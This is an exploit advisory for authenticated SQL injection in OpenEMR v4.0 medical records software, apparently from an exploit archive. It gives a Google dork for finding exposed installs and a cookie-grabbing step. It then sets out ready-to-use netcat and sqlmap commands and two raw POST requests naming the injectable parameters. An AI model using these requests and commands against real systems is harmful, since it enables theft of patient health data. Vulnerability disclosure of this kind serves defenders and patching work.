# Exploit Title: Open EMR # Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:" # Date: 3 / 08 / 2011 . # Author: Mehdi Boukazoula ; Houssam Sahli . # Software Link with patch : http://www.oemr.org/wiki/OpenEMR_Downloads # Version: v 4.0 full patched # Tested on: v 4.0 # Description : the authenticated user can exploit this vulnerability by getting the cookie from browser using url javascript:alert(document.cookie) ,put it in request file with sql command and exploit: root@# cat request.txt | nc -vv yourhost 80 or simply use sqlmap like this : root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs -------------------------------------------------------------------------------------------------------- ---Request1 : Affected parameters : provider_id + pc_category POST http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1 Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-encoding: identity Keep-alive: 115 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Host: 127.0.0.1 Referer: http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search Cookie: PUT-THE-COOKIE-HERE Content-type: application/x-www-form-urlencoded Proxy-connection: keep-alive pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility= -------------------------------------------------------------- ---Request2 : Affected parameters : form_patient_id POST http://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://127.0.0.1/openemr/interface/reports/chart_location_activity.php Cookie: PUT-THE-COOKIE-HERE Content-Type: application/x-www-form-urlencoded Content-Length: 38 form_refresh=true&form_patient_id=patient ---------------------------------------------------------------